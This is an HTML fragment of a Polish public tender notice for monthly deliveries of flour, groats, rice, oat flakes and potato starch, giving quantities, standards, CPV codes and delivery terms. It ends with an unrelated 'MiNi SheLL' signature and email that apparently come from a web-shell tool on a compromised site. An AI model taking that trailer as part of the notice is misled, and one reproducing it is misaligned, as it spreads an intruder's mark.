Częstotliwość realizacji dostaw: 1 raz w miesiącu. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia powinien wynosić 30 dni od dnia dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.50-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kod CPV - 15600000-4 Produkty przemiału ziarna, skrobi i produktów skrobiowych.

L.p.	Nazwa	j.m.	Ilość
1.	Mąka	kg.	3300,00
2.	Kasza manna	Kg.	600,00
3.	Kasza pęczak	kg.	700,00
4.	Kasza mazurska	kg.	2000,00
5.	Kasza kukurydziana	kg.	450,00
6.	Płatki Owsiane	kg.	400,00
7.	Ryż	kg.	3500,00
8.	Mąka ziemniaczana	kg.	100,00


MĄKA pszenna typ 500 PN-A-74022              opakowanie do 30 kg

KASZA MANNA  PN-88/A-74036                 opakowanie do 30kg

KASZA PĘCZAK  PN-A-74202                      opakowanie do 30kg

KASZA MAZURSKA średnia PN-87/A-74203 opakowanie do 30 kg

KASZA KUKURYDZIANA    PN-A-74205   opakowanie do 30 kg

PŁATKI OWSIANE  PN-82/A-74037               opakowanie do 30 kg

RYŻ ŁUSKANY PN-ISO 7301                         opakowanie do 30 kg

MĄKA ZIEMNIACZANA PN-93/A-74710      opakowanie do   2 kg

Towar dostarczany będzie zamawiającemu do  godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w miesiącu  Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia powinien wynosić 30 dni od dnia dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com